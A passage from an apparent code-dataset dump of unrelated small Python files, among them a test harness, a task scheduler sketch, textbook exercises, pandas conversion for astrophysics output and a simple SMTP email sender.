def BR30():
string = 20
string = struct.pack('!B',string)
ser.write(string)
def BR15():
string = 21
string = struct.pack('!B',string)
ser.write(string)
def BS00():
string = 22
string = struct.pack('!B',string)
ser.write(string)
def BL15():
string = 23
string = struct.pack('!B',string)
ser.write(string)
def BL30():
string = 24
string = struct.pack('!B',string)
ser.write(string)
|
2,963 | e9a4ea69a4bd9b75b8eb8092b140691aab763ae4 | from collections import Counter
from collections import deque
import os
def wc(argval):
bool = False
if("|" in argval):
bool = True
del argval[len(argval)-1]
hf=open("commandoutput.txt","r+")
open("commandoutput.txt","w").close()
hf=open("commandoutput.txt","w")
numoflines = 0
numofwords = 0
numofchars = 0
if len(argval)==2 and os.path.exists(argval[1]):
filename=argval[1]
fname = filename
with open(fname, 'r') as f:
for line in f:
if not line.isspace():
words = line.split()
numoflines += 1
numofwords += len(words)
numofchars += len(line)
if(bool):
hf.write("line count= %d, word count= %d, charcount= %d"%(numoflines,numofwords,numofchars))
else:
print("line count= %d, word count= %d, charcount= %d, filename=%s"%(numoflines,numofwords,numofchars,filename))
hf.write("line count= %d, word count= %d, charcount= %d"%(numoflines,numofwords,numofchars))
hf.close()
elif len(argval)==3 and os.path.exists(argval[2]):
filename=argval[2]
#print "wc soemthing"
fname = filename
with open(fname, 'r') as f:
#print "wc soemthing2"
for line in f:
if not line.isspace():
words = line.split()
numoflines += 1
numofwords += len(words)
numofchars += len(line)
if(bool):
hf.write("line count= %d, word count= %d, charcount= %d"%(numoflines,numofwords,numofchars))
else:
print("line count= %d, word count= %d, charcount= %d, filename=%s"%(numoflines,numofwords,numofchars,filename))
hf.close()
else:
print("source file not found")
|
2,964 | 7e20c61fa30ea93e69a2479e70449638eb52b7bb | #!/usr/bin/env python
"""
Update the expected test outputs and inputs for rsmsummarize and rsmcompare tests.
This script assumes that you have already run `nose2 -s tests` and ran the entire
test suite. By doing so, the output has been generated under the given outputs
directory. And that is what will be used to generate the new expected output
under `tests/data/experiments`.
#############################################################################################
# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #
#############################################################################################
The script works as follows. For each experiment test:
- The script locates the output under the updated outputs directory.
- New and changed files in this directory are copied over to the expected test
output location.
- Old files in the expected test output are deleted.
- Files that are already in the expected test output and have not changed are
left alone.
- Directories that are missing or empty under the updated test outputs are shown.
- For rsmsummarize and rsmcompare tests, the same logic is also applied to input
data. It is assumed that the input experiments are copies of the experiments
from existing tests.
Note: If running this script results in changes to the inputs for rsmcompare
or rsmsummarize tests, you will need to first re-run the tests for those two
tools and then, potentially, run this script again to update their test outputs.
See `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_
for a further explanation of this process.
The script prints a log detailing the changes made for each experiment test.
:author: Nitin Madnani
:author: Anastassia Loukina
:author: Jeremy Biggs
:organization: ETS
"""
import argparse
import re
import sys
from pathlib import Path
from rsmtool.test_utils import FileUpdater
def main(): # noqa: D103
# set up an argument parser
parser = argparse.ArgumentParser(prog="update_test_files.py")
parser.add_argument(
"--tests",
dest="tests_dir",
required=True,
help="The path to the existing RSMTool tests directory",
)
parser.add_argument(
"--outputs",
dest="outputs_dir",
required=True,
help="The path to the directory containing the updated test "
"outputs (usually `test_outputs`)",
)
# parse given command line arguments
args = parser.parse_args()
# print out a reminder that the user should have run the test suite
run_test_suite = input("Have you already run the whole test suite? (y/n): ")
if run_test_suite == "n":
print("Please run the whole test suite using `nose2 -s tests` before running this script.")
sys.exit(0)
elif run_test_suite != "y":
print("Invalid answer. Exiting.")
sys.exit(1)
else:
print()
# iterate over the given tests directory and find all files named
# `test_experiment_*.py` and get their suffixes for use with the
# FileUpdater object.
suffixes = [
re.sub(r"test_experiment_", "", p.stem) for p in Path("tests").glob("test_experiment_*.py")
]
# instantiate a FileUpdater object
updater = FileUpdater(
test_suffixes=suffixes,
tests_directory=args.tests_dir,
updated_outputs_directory=args.outputs_dir,
)
# run the file updates
updater.run()
# now print the report from the updated object
updater.print_report()
if __name__ == "__main__":
main()
|
2,965 | 173b8e66ead62e3aa70805e42e06ea05257d5ee2 | class Tool:
def __init__(self, name, weight):
self.name = name
self.weight = weight
def __repr__(self):
return f'Tool({self.name!r},{self.weight})'
tools = [
Tool('수준계', 3.5),
Tool('해머', 1.25),
Tool('스크류드라이버', .5),
Tool('끌', .25)
]
print(repr(tools))
tools.sort(reverse=True, key=lambda x: len(x.name))
print(tools) |
2,966 | 4f91c57ad42759654a87328d5c92de8da14ca5ea | import os
from CTFd.utils.encoding import hexencode
def generate_nonce():
return hexencode(os.urandom(32))
|
2,967 | a24ab93983546f8ae0fab042c121ac52388e62e8 | users = {1: "Tom", 2: "Bob", 3: "Bill"}
elements = {"Au": "Oltin", "Fe": "Temir", "H": "Vodorod", "O": "Kislorod"} |
2,968 | 1c01fbf7eafd49ada71cb018a62ead5988dcf251 | from prediction_model import PredictionModel
import util.nlp as nlp
import re
class NLPPredictionModel(object):
def getPasswordProbabilities(self, sweetwordList):
# can not deal with sweetword that contains no letters
result = []
for s in sweetwordList:
words = re.findall(r"[a-zA-Z']+", s)
if not words:
result.append(0.0)
else:
result.append(sum([nlp.getScore(w) for w in words]) / float(len(words)))
sum_result = sum(result)
return [r / float(sum_result) for r in result]
|
2,969 | 30a2e4aa88b286179e2870205e90fab4a7474e12 | #!/usr/bin/env python
# -*-coding:utf-8-*-
__author__ = '李晓波'
from linux import sysinfo
#调用相应收集处理函数
def LinuxSysInfo():
#print __file__
return sysinfo.collect()
def WindowsSysInfo():
from windows import sysinfo as win_sysinfo
return win_sysinfo.collect()
|
2,970 | a74d27d9e31872100b4f22512abe9de7d9277de7 | # -*- coding: GB18030 -*-
import inspect
import os,sys
import subprocess
from lib.common.utils import *
from lib.common.loger import loger
from lib.common import checker
from lib.common.logreader import LogReader
import shutil
from lib.common.XmlHandler import *
from lib.common.Dict import *
class baseModule(object):
def __init__(self):
self.sys = Shell_System()
self.path =None
#模块bin 路径
self.bin_path = None
#模块配置路径
self.conf_path = None
#模块字典路径
self.dict_path = None
#log路径
self.log_path = None
#用于存储被分配得到的端口
self.port=[]
#用于表示本模块需要设置的端口数目
self.port_num = 0
#用于表示模块名
self.type=None
#是否进行conf 备份flag
self.conf_bak_flag = False
#是否进行dict备份
self.dict_back_flag = False
#以下变量根据需要在各个module中初始化
#notice 日志名称
self.ntlogname = None
#WF日志名称
self.wflogname = None
self.nt_logreader = None
self.wf_logreader = None
def add_relation(self,module):
"""
@note: 参数传递的是已经生成的其他module的实例
具体关联关系的建立
"""
self.module_rel_set.append(module)
loger.info("Topology is %s ----> %s",self.type,getattr(module,"type"))
return 0
def build_relation(self):
"""
@note: 如果有下游模块必须实现改方法
建本模块和下游模块关系
"""
pass
def get_port(self):
"""
@note: 返回本模块申请的端口list
"""
return self.port
def set_listen_port(self):
"""
@note:各模块实现设置对用的conf
"""
pass
def start(self):
"""
@note: 启动模块
注意可通过端口或进程是否存在判断是否启动成功
checker.check_process_exist(processpath)
checker.check_port_exist(port)
"""
pass
def stop(self):
"""
@note:停止运行
默认通过self.bin_path实现
"""
if self.bin_path <> None and os.path.exists(self.bin_path):
kill_process(self.bin_path)
loger.debug("kill process %s"%(self.bin_path))
else:
loger.warning("module [%s] has not bin_path!"%(self.type))
def bak_or_revert_env(self):
"""
@note:根据bakflag 进行bak 操作
默认进行两项bak conf dict
如果path.robotbak不存在,则将path备份
- 如果path.dtsbak存在,则用path.robotbak覆盖path
"""
#清理log目录
if self.log_path is not None:
cmd = "rm -rf " + self.log_path
loger.debug(cmd)
self.sys.shell(cmd)
# 重命名core
rename_cores(self.path)
#备份恢复conf
if self.conf_bak_flag:
bak_or_revert(self.conf_path)
#备份恢复dict
if self.dict_back_flag:
bak_or_revert(self.dict_path)
return 0
def __conf_op(self, optype, confid, k, v=None):
"""
@note: 封装 获取,删除、设置3种conf操作方法
optype为操作类型 0:设置、1:获取、2:删除
对外接口由 set_conf、get_conf、delete_conf
"""
if self.path is None:
raise AssertionError("get modulepath error[%s]"%(self.path))
path, seg = getconfitem(self.path, self.type, confid)
if path is None:
raise AssertionError("set conf error[%s][%s][%s][%s]"%(self.type, confid, k , v))
conf = UbConfigParser(path, seg)
if optype == 0:
conf.set(k , v)
return
if optype == 1:
return conf.get(k)
if optype == 2:
conf.delete(k)
return
def set_conf(self, confid, k, v):
"""
@note:设置conf
confid为conf.xml中注册id
"""
return self.__conf_op(0, confid, str(k), str(v))
def get_conf(self, confid, k):
return self.__conf_op(1, confid, str(k))
def delete_conf(self, confid, k):
return self.__conf_op(2, confid, str(k))
def set_dict(self, dictid, *line_item):
"""
@note:设置字典数据 将数据设置进不同的列中
"""
path, seg = getdictitem(self.type, dictid)
real_path = os.path.join(self.path, path)
dicth = DictHandler(real_path, seg)
dicth.set_dict(line_item)
def clear_dict(self, dictid):
"""
@note:清理字典
"""
path, seg = getdictitem(self.type, dictid)
real_path = os.path.join(self.path, path)
dicth = DictHandler(self, real_path, seg)
dicth.clear_dict()
#以下接口为测试接口
def check_notice_log_has(self, regex):
"""
@note:检查 notice log中是否包含某项
regex为匹配正则表达式
return: 包含返回True、否则为False
"""
if self.nt_logreader == None:
nt_log_path = os.path.join(self.log_path, self.ntlogname)
self.nt_logreader = LogReader(nt_log_path)
return checker.check_log_contain(self.nt_logreader,regex)
def check_wf_log_has(self, regex):
"""
检查wf日志包含某项
regex为匹配正则表达式
return: 包含返回True、否则为False
"""
if self.wf_logreader == None:
wf_log_path = os.path.join(self.log_path, self.wflogname)
self.wf_logreader = LogReader(wf_log_path)
return checker.check_log_contain(self.wf_logreader, regex)
def check_fatal(self):
"""
@note:检查结果中是否包含fatal
return: 包含fatal 返回 True, 否则返回false
"""
regex="^FATAL.*"
return self.check_wf_log_has(regex)
def set_req(self, reqresjs=None, *agrs):
"""
@note:设置请求
注意不是字典设置
"""
pass
def set_res():
"""
@note:设置返回
"""
pass
def common_check(self):
"""
通用commoncheck接口
该接口无传入参数
一般用作fatal、core等检查
"""
#将log打印出
if self.nt_logreader == None:
nt_log_path = os.path.join(self.log_path, self.ntlogname)
self.nt_logreader = LogReader(nt_log_path)
if self.wf_logreader == None:
wf_log_path = os.path.join(self.log_path, self.wflogname)
self.wf_logreader = LogReader(wf_log_path)
loger.diagnose("Module[%s] wf logs:\n%s"%(self.type, self.wf_logreader.read_fatal_and_last_lines(10)))
loger.diagnose("Module[%s] notice logs:\n%s"%(self.type, self.nt_logreader.read_last_lines(10)))
#检查core
log_cores(self.path)
#检查FATAL
if self.check_fatal():
raise AssertionError("There FATAL in module[%s]"%(self.type))
def check(self, checkjs=None):
"""
@note:check接口
"""
pass
def reqdata(self):
'''
@note: 将各个模块的req形成json赋值给内部变量
'''
pass
def get_used_port(self):
"""
@note:获得该模块所在机器的空闲端口号
"""
used_port_list = self.sys.shell("netstat -na 2>/dev/null|grep \":\"|awk -F \"[ :]\" '{print $17}'",output = "true")[1].splitlines()
return used_port_list
def test_system():
"单元测试"
npatSys = Shell_System()
npatSys.shell("echo '12345' > a.txt")
npatSys.shell("rm b.txt")
npatSys.shell("cat a.txt b.txt", output = True)
npatSys.shell("ttt")
npatSys.shell("ttt", output = True)
used_port_list = npatSys.shell("netstat -na 2>/dev/null|grep \":\"|awk -F \"[ :]\" '{print $17}'",output = "true")[1].splitlines()
print used_port_list
if __name__ == '__main__':
mm = baseModule()
print type(mm.sys)
|
2,971 | 0d565c9f92a60d25f28c903c0a27e7b93d547a4f | #Create Pandas dataframe from the DarkSage output G['']
import pandas as pd
import numpy as np
# This is a way to converte multi dimensional data into pd.Series and then load these into the pandas dataframe
Pos = []
for p in G['Pos']:
Pos.append(p)
Pos_df = pd.Series(Pos, dtype=np.dtype("object"))
Vel = []
for v in G['Vel']:
Vel.append(v)
Vel_df = pd.Series(Vel, dtype=np.dtype("object"))
Spin = []
for s in G['Spin']:
Spin.append(s)
Spin_df = pd.Series(Spin, dtype=np.dtype("object"))
Disc_r = []
for d in G['DiscRadii']:
Disc_r.append(d)
Disc_df = pd.Series(Disc_r, dtype=np.dtype("object"))
Disc_gas = []
for g in G['DiscGas']:
Disc_gas.append(g)
Disc_gas_df = pd.Series(Disc_gas, dtype=np.dtype("object"))
Disc_stars = []
for g in G['DiscStars']:
Disc_stars.append(g)
Disc_stars_df = pd.Series(Disc_stars, dtype=np.dtype("object"))
SpinStars = []
for g in G['SpinStars']:
SpinStars.append(g)
SpinStars_df = pd.Series(SpinStars, dtype=np.dtype("object"))
SpinGas = []
for g in G['SpinGas']:
SpinGas.append(g)
SpinGas_df = pd.Series(SpinGas , dtype=np.dtype("object"))
SpinClassicalBulge = []
for g in G['SpinClassicalBulge']:
SpinClassicalBulge.append(g)
SpinClassicalBulge_df = pd.Series(SpinClassicalBulge, dtype=np.dtype("object"))
DiscHI = []
for g in G['DiscHI']:
DiscHI.append(g)
DiscHI_df = pd.Series(DiscHI, dtype=np.dtype("object"))
DiscH2 = []
for g in G['DiscH2']:
DiscH2.append(g)
DiscH2_df = pd.Series(DiscH2, dtype=np.dtype("object"))
DiscSFR = []
for g in G['DiscSFR']:
DiscSFR.append(g)
DiscSFR_df = pd.Series(DiscSFR, dtype=np.dtype("object"))
DiscGasMetals = []
for g in G['DiscGasMetals']:
DiscGasMetals.append(g)
DiscGasMetals_df = pd.Series(DiscGasMetals, dtype=np.dtype("object"))
DiscStarsMetals = []
for g in G['DiscStarsMetals']:
DiscStarsMetals.append(g)
DiscStarsMetals_df = pd.Series(DiscStarsMetals, dtype=np.dtype("object"))
######################################
DS = pd.DataFrame({'Type' : G['Type' ],
'GalaxyIndex' : G['GalaxyIndex' ],
'HaloIndex' : G['HaloIndex' ],
'SimulationHaloIndex' : G['SimulationHaloIndex' ],
'TreeIndex' : G['TreeIndex' ],
'SnapNum' : G['SnapNum' ],
'CentralGalaxyIndex' : G['CentralGalaxyIndex' ],
'CentralMvir' : G['CentralMvir' ],
'mergeType' : G['mergeType' ],
'mergeIntoID' : G['mergeIntoID' ],
'mergeIntoSnapNum' : G['mergeIntoSnapNum' ],
'dT' : G['dT' ],
'Pos' : Pos_df,
'Vel' : Vel_df ,
'Spin' : Spin_df ,
'Len' : G['Len' ],
'LenMax' : G['LenMax' ],
'Mvir' : G['Mvir' ],
'Rvir' : G['Rvir' ],
'Vvir' : G['Vvir' ],
'Vmax' : G['Vmax' ],
'VelDisp' : G['VelDisp' ],
'DiscRadii' : Disc_df,
'ColdGas' : G['ColdGas' ],
'StellarMass' : G['StellarMass' ],
'MergerBulgeMass' : G['MergerBulgeMass' ],
'InstabilityBulgeMass' : G['InstabilityBulgeMass' ],
'HotGas' : G['HotGas' ],
'EjectedMass' : G['EjectedMass' ],
'BlackHoleMass' : G['BlackHoleMass' ],
'IntraClusterStars' : G['IntraClusterStars' ],
'DiscGas' : Disc_gas_df,
'DiscStars' : Disc_stars_df,
'SpinStars' : SpinStars_df,
'SpinGas' : SpinGas_df,
'SpinClassicalBulge' : SpinClassicalBulge_df,
'StarsInSitu' : G['StarsInSitu' ],
'StarsInstability' : G['StarsInstability' ],
'StarsMergeBurst' : G['StarsMergeBurst' ],
'DiscHI' : DiscHI_df,
'DiscH2' : DiscH2_df,
'DiscSFR' : DiscSFR_df,
'MetalsColdGas' : G['MetalsColdGas' ],
'MetalsStellarMass' : G['MetalsStellarMass' ],
'ClassicalMetalsBulgeMass' : G['ClassicalMetalsBulgeMass' ],
'SecularMetalsBulgeMass' : G['SecularMetalsBulgeMass' ],
'MetalsHotGas' : G['MetalsHotGas' ],
'MetalsEjectedMass' : G['MetalsEjectedMass' ],
'MetalsIntraClusterStars' : G['MetalsIntraClusterStars' ],
'DiscGasMetals' : DiscGasMetals_df,
'DiscStarsMetals' : DiscStarsMetals_df,
'SfrFromH2' : G['SfrFromH2' ],
'SfrInstab' : G['SfrInstab' ],
'SfrMergeBurst' : G['SfrMergeBurst' ],
'SfrDiskZ' : G['SfrDiskZ' ],
'SfrBulgeZ' : G['SfrBulgeZ' ],
'DiskScaleRadius' : G['DiskScaleRadius' ],
'CoolScaleRadius' : G['CoolScaleRadius' ],
'StellarDiscScaleRadius' : G['StellarDiscScaleRadius' ],
'Cooling' : G['Cooling' ],
'Heating' : G['Heating' ],
'LastMajorMerger' : G['LastMajorMerger' ],
'LastMinorMerger' : G['LastMinorMerger' ],
'OutflowRate' : G['OutflowRate' ],
'infallMvir' : G['infallMvir' ],
'infallVvir' : G['infallVvir' ],
'infallVmax' : G['infallVmax' ]})
|
2,972 | c581d9714681e22c75b1eeb866ea300e87b883f1 | def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = r'(.*\.)?(.*\.)(.*)' # Eg: (www.)(google.)(com)
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
# sort by domain name and then everything left of
# Eg: google, com, www
domain_values = (
domain_search.group(2),
domain_search.group(3),
domain_search.group(1)
)
key = '%s%s%s' % domain_values
else:
# no host portion, just return the domain name
key = domain
return(key)
domains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']
print('before: %s' % domains.__repr__())
domains.sort(key=domain_sort_key)
print('after: %s' % domains.__repr__())
|
2,973 | a29cf9e7006d52cea8f5ccdcbc2087983ffa3ef3 | from modules.core.logging.logging_service import LoggingService
from modules.core.logging.models import LogLevel, LogEntry
import pytest
from .setup import register_test_db, register_test_injections, teardown,\
drop_all_collections
@pytest.fixture(autouse=True)
def setup():
register_test_db()
register_test_injections()
def test_mongo_logging_client_persists_log():
"""
Test to see if the mongodb client logger
can persist a log entry to the database
"""
error_message = "This is a test message."
logger = LoggingService(console_output=True)
result = logger.log(LogEntry(LogLevel.ERROR, __name__, error_message))
logger.log(LogEntry(LogLevel.WARN, __name__, error_message))
logger.log(LogEntry(LogLevel.INFO, __name__, error_message))
logger.log(LogEntry(LogLevel.DEBUG, __name__, error_message))
assert result.message == error_message
def tests_teardown():
drop_all_collections()
teardown()
|
2,974 | 19888c998e8787533e84413272da1183f16fcdb1 | # 8-7. Album: Write a function called make_album() that builds a dictionary
# describing a music album. The function should take in an artist name and an
# album title, and it should return a dictionary containing these two pieces
# of information. Use the function to make three dictionaries representing
# different albums. Print each return value to show that the dictionaries are
# storing the album information correctly. Use None to add an optional
# parameter to make_album() that allows you to store the number of songs on an
# album. If the calling line includes a value for the number of songs, add
# that value to the album’s dictionary. Make at least one new function call
# that includes the number of songs on an album.
# PART ONE
def make_album(artist_name, album_title):
"""Build a dictionary describing a music album"""
music_album = {
'Artist': artist_name.title(),
'Album': album_title.title()
}
return music_album
print("Here's Part One:")
cardi = make_album('cardi b', 'invasion of privacy')
print(cardi)
jhene = make_album('jhene aiko', 'souled out')
print(jhene)
lennon = make_album('lennon stella', 'three. two. one.')
print(lennon)
# PART TWO
def make_album_two(artist_name, album_title, number_of_songs= None):
"""Build a dictionary describing a music album"""
music_album = {'Artist': artist_name.title(),
'Album': album_title.title()}
if number_of_songs:
music_album['Number of Songs'] = number_of_songs
return music_album
print("\nHere's Part Two:")
cardi = make_album_two('cardi b', 'invasion of privacy')
print(cardi)
jhene = make_album_two('jhene aiko', 'souled out')
print(jhene)
lennon = make_album_two('lennon stella', 'three. two. one.', 13)
print(lennon)
|
2,975 | e40b34f0ee51cc14615c6225a7676929e6d2876a | #!/usr/bin/env python3
import datetime, random
class State(object):
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class State_New(State):
def __init__(self):
super(State_New, self).__init__("New")
class State_Underway(State):
def __init__(self):
super(State_Underway, self).__init__("Underway")
class State_Paused(State):
def __init__(self):
super(State_Paused, self).__init__("Paused")
class State_Completed(State):
def __init__(self):
super(State_Completed, self).__init__("Completed")
class TaskMan(object):
def __init__(self):
self.tasks = []
class Resource(object):
def __init__(self, name):
self.name = name
# the available_count is how many tasks this resource is available for.
self.available_count = 0
# The assigned count is how many times this resource has been used.
# For sorting, sort based on available+assigned, unless there are
# multiple resources at the same value
self.assigned_count = 0
def __lt__(self, other):
return self.available_count < other.available_count
def __cmp__(self, other):
return cmp(self.available_count, other.available_count)
def __str__(self):
return "Name: %s, weight: %s" % (self.name, self.available_count)
class ResourceGroup(object):
def __init__(self, *resources):
self.resources = set(resources)
def __str__(self):
return ", ".join([x.name for x in self.resources])
#return str(self.resources)
class ResourceManager(object):
def __init__(self):
self.resources = set()
def add(self, r):
self.resources.add(r)
def __str__(self):
r = []
for res in self.resources:
r.append(str(res))
return "\n".join(r)
class Task(object):
s_new = State_New()
s_underway = State_Underway()
s_paused = State_Paused()
s_completed = State_Completed()
def __init__(self, name, duration=4, numworkers=1, resource_group=None):
self.work_units = [] # work units applied so far
self.name = name
self.predecessors = []
self.successors = []
self.state = self.s_new
self.resource_group = resource_group
self.duration = duration
self.numworkers = numworkers
self.start_offset = 0
# hard assigned resources are those designated by the user, and are not
# subject to change by the program.
self.hard_assigned_resources = []
# auto_assigned resources are those designated by the program and may be
# changed at any time until the task has begun. Once the task has begun,
# the resource becomes hard_assigned and must be changed manually if it
# needs to be changed.
self.auto_assigned_resources = []
# A task may be waiting to start, underway, paused or completed.
# Each state change could be accompanied by a comment. If a task is
# paused because it is waiting for either another resource, the
# completion of another task, or some 3rd party action, that should be
# noted in a comment.
# def assign(self):
# self.resource_group.sort()
# for x in range(self.numworkers):
# self.auto_assigned_resources.append(self.resource_group.resources[x])
def avail(self, time, resource_group):
"""
Build a set of resources who are available for a given time. It might
make more sense to work based on a given restricted resource set.
"""
a = set()
for r in self.resource_group.resources:
pass
def __str__(self):
r = []
#r.append("Task: %s" % self.name)
#r.append(" State: %s" % self.state)
#r.append(" Hard Resources: %s" % str(self.hard_assigned_resources))
#r.append(" Auto Resources: %s" % str(self.auto_assigned_resources))
#r.append(" Resource Group: %s" % str(self.resource_group))
if self.auto_assigned_resources:
r.append("%s%s %s" % (self.start_offset*" ", str("-"*self.duration),
str(self.auto_assigned_resources)))
else:
r.append("%s%s %s" % (self.start_offset*" ", str("-"*self.duration),
str(self.resource_group)))
#str(datetime.timedelta(minutes=self.duration*15)))
return "\n".join(r)
def flatten(tasks):
# Because resources may be shared across multiple projects, when flattening
# you need to take that into account.
# I think actually that flattening a set of projects simultaneously would
# probably be a good thing. This would allow us to maximize the efficiency
# of resource allocation.
# This won't always be possible, some people will have outside committments
# that cannot be shifted, and this needs to be taken into account when
# assigning them.
current_time = 0
running = True
while running:
needs_assignment = False
for t in tasks:
avail_resources = t.avail(current_time, t.resource_group)
if not needs_assignment:
running = False
if __name__ == '__main__':
rm = ResourceManager()
a = Resource("A")
b = Resource("B")
c = Resource("C")
d = Resource("D")
rm.add(a)
rm.add(b)
rm.add(c)
rm.add(d)
# numtasks = int(random.random()*20)
numtasks = 20
tasks = []
for x in range(numtasks):
fg = [a,b,c,d]
random.shuffle(fg)
#print("Fullgroup: %s" % ", ".join([str(x) for x in fg]))
group = fg[:int(random.random()*3)+1]
duration = int(random.random()*32)+1
#print("Group: %s" % ", ".join([str(x) for x in group]))
t = Task("Prepare Report",duration=duration,
resource_group = ResourceGroup(*group))
tasks.append(t)
for t in tasks:
print(str(t))
# -------------------
# 1. Create a list of resources
# 2. Create a list of tasks
# 3. Create a resource group for each set of tasks
# 4. Auto assign resources to tasks and level the tasks
# So, first, go through all the tasks and weight each resource with how many
# times they appear as available
for t in tasks:
for r in t.resource_group.resources:
r.available_count += 1
# -------------------
# As we lay out tasks, we are at a "current time" point. Once all resources
# are assigned for the current time point, we find the next nearest time
# point when a resource becomes free - at the end of the shortest next task.
# Then we begin looking at assignments again.
#
# So we start at CT=0, and go through each unassigned task.
# When we get to an unassigned task, see if any of the resources assigned to
# it are available at this time.
# If so, take the set of available resources, sort in inverse
# weight order, and choose the first.
#
# After every assignment, add one to the weight of the resource. The idea is
# to bias the resource against being assigned again, until other less
# assigned resources catch up. The only thing I would be afraid of would be
# a resource who is available across many tasks not getting assigned to any
# because his score is too high. Maybe it would be best to keep two tallys -
# the number of available, and the number of assignments, and when sorting
# in preference order, order first by (avail+assigned), and then within a
# given group, order by assigned. This way, if someone has 7 availability
# slots and 0 assigned slots, they will get chosen before someone with 5
# availability slots and 2 assigned slots.
flatten(tasks)
print(str(rm))
# If someone is working on something and they get blocked waiting for
# something (another task or an outside supplier) then the task needs to be
# marked as "blocked/paused" and the assigned tasks shuffled accordingly.
#
# So the idea is that on your smartphone, you can always bring up a "What do
# I do now" display, which is sensitive to task priorities and stalls.
# Another thing I'd really like to try to take into account as much as
# possible is the fact that switching mental contexts between projects is an
# uncomfortable and time consuming process, so we'd want to minimize that
# as much as possible. Probably something like, try to switch projects no
# more often than once every 2 hours (8 work blocks).
|
2,976 | 4dd71d01e499f3d0ee49d3bf5204fb3bbb03ede5 | from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.utils import parseaddr,formataddr
import smtplib
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((Header(name,'UTF-8').encode(), addr))
from_addr='gaofeng4280@163.com'
to_addr='1071380275@qq.com'
smtp_server='smtp.163.com'
passwd=input('Password: ')
msg=MIMEText('hello, send by Python...','plain','utf-8')
msg['From']=_format_addr('Python 爱好者<%s>' % from_addr)
msg['To']=_format_addr('开发者<%s>' % to_addr)
msg['Subject']=Header('来自SMTP的邮件...','utf-8').encode()
server=smtplib.SMTP(smtp_server,25)
server.set_debuglevel(1)
server.login()
server.sendmail(from_addr,[to_addr],msg.as_string())
server.quit()
|
2,977 | 5d55c586c57de8f287d9f51f0cb1f188c8046c29 | #!/bin/python3
def solveMeFirst(a,b):
return a + b
print(solveMeFirst(int(input()),int(input())))
|
2,978 | 34f3212b0254cbcb5e1ca535a29d4fe820dcaad8 | from .hacker import HackerRegistrationPage
from .judge import JudgeRegistrationPage
from .mentor import MentorRegistrationPage
from .organizer import OrganizerRegistrationPage
from .user import UserRegistrationPage
|
2,979 | 57490e56833154d3ed3a18b5bf7bc4db32a50d69 | import numpy as np
import json
from netCDF4 import Dataset,stringtochar,chartostring,Variable,Group
def is_json(myjson):
try:
json_object = json.loads(myjson)
except:
return False
return True
def getType(type):
t=np.dtype(type).char
if t=="S":return 'S1'
if t=="U":return 'U1'
return t
def getType3(type):
t=np.dtype(type).char
if t=="B":return 'b'
if t=="H":return 'h'
if t=="I":return 'i'
if t=="l":return 'i'
if t=="S":return 'S1'
if t=="U":return 'U1'
return t
def prepareTransformAttributes(attributes):
dtype=attributes.get("type")
dtype="{}".format(dtype)
min=attributes.get("min")
max=attributes.get("max")
ftype=attributes.get("ftype")
maxV=np.power(2.0,np.iinfo(np.dtype(dtype)).bits)-1.0
minO=np.iinfo(np.dtype(dtype)).min
maxO=np.iinfo(np.dtype(dtype)).max
f=maxV/(max-min)
return min,max,minO,maxO,f,dtype,ftype
def getT(attributes,value,isChar=False):
ftype=attributes['ftype']
if "min" in attributes and "max" in attributes and attributes['type']!=attributes['ftype'] :
min,max,minO,maxO,f,dtype,ftype=prepareTransformAttributes(attributes)
value=(((value+np.abs(minO))/f)+min).astype(ftype)
if ftype=="M":value=value.astype('datetime64[ms]')
if ftype=="S1":value=value.astype("S1") if isChar else chartostring(value.astype("S1"))
return value
def setT(attributes,value,isChar=False,variable=None):
ftype=attributes['ftype']
if ftype=="M":value=value.astype("datetime64[ms]").astype("f8")
if ftype=='S1' and not isChar:value=stringtochar(np.array(value).astype("S{}".format(variable.shape[1])))
if "min" in attributes and "max" in attributes and attributes['type']!=attributes['ftype'] :
min,max,minO,maxO,f,dtype,x=prepareTransformAttributes(attributes)
value=np.clip(value, min, max)
value=(value-min)*f-np.abs(minO)
# value=np.rint(np.nextafter(value, value+1))
value=np.rint(value)
value=np.clip(value, minO, maxO)
value=value.astype(dtype)
return value
class NpEncoder(json.JSONEncoder):
"""
Encoder to change numpy type to python type.
This is used for creating JSON object.
"""
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NpEncoder, self).default(obj)
def getDimensionsV(variables,dimensionsV={}):
for vname in variables:
for dname in variables[vname]['dimensions']:
if dname in dimensionsV:dimensionsV[dname].append(vname)
else:dimensionsV[dname]=[vname]
return dimensionsV
def getVariablesG(groups):
obj={}
for gname in groups:
for vname in groups[gname]['variables']:
if vname in obj:obj[vname].append(gname)
else:obj[vname]=[gname]
for vname in obj:
obj[vname]=sorted(list(set(obj[vname])))
return obj |
2,980 | 863bae04a90143ed942a478c4b71a2269e123bb5 | from compass import models
from compass.models.MetabolicModel import MetabolicModel
def test_sbml_3():
model = models.load_metabolic_model("RECON1_xml")
assert isinstance(model, MetabolicModel)
assert len(model.reactions) == 3742
assert len(model.species) == 2766
def test_sbml_2():
model = models.load_metabolic_model("RECON2.2")
assert isinstance(model, MetabolicModel)
assert len(model.reactions) == 7785
assert len(model.species) == 6047
def test_mat():
model = models.load_metabolic_model("RECON2_mat")
assert isinstance(model, MetabolicModel)
assert len(model.reactions) == 7440
assert len(model.species) == 5063
def test_to_json():
model = models.load_metabolic_model("RECON2.2")
json = model.to_JSON()
assert isinstance(json, str)
model = models.load_metabolic_model("RECON1_xml")
json = model.to_JSON()
assert isinstance(json, str)
model = models.load_metabolic_model("RECON2_mat")
json = model.to_JSON()
assert isinstance(json, str)
|
2,981 | ed2ae166c4881289b27b7e74e212ba2d6164998b |
import numpy as np
class Element(object):
def __init__(self):
self.ndof = 0
self.nn = 0
self.ng = 0
self.element_type = 0
self.coord_position = np.array([])
self.setup()
def setup(self):
pass
def shape_function_value(self):
pass
def shape_function_partial(self):
pass
|
2,982 | b109568c4dba05b16cbed1759a2b9e0a99babc67 | import pandas as pd
import numpy as np
from scipy import misc
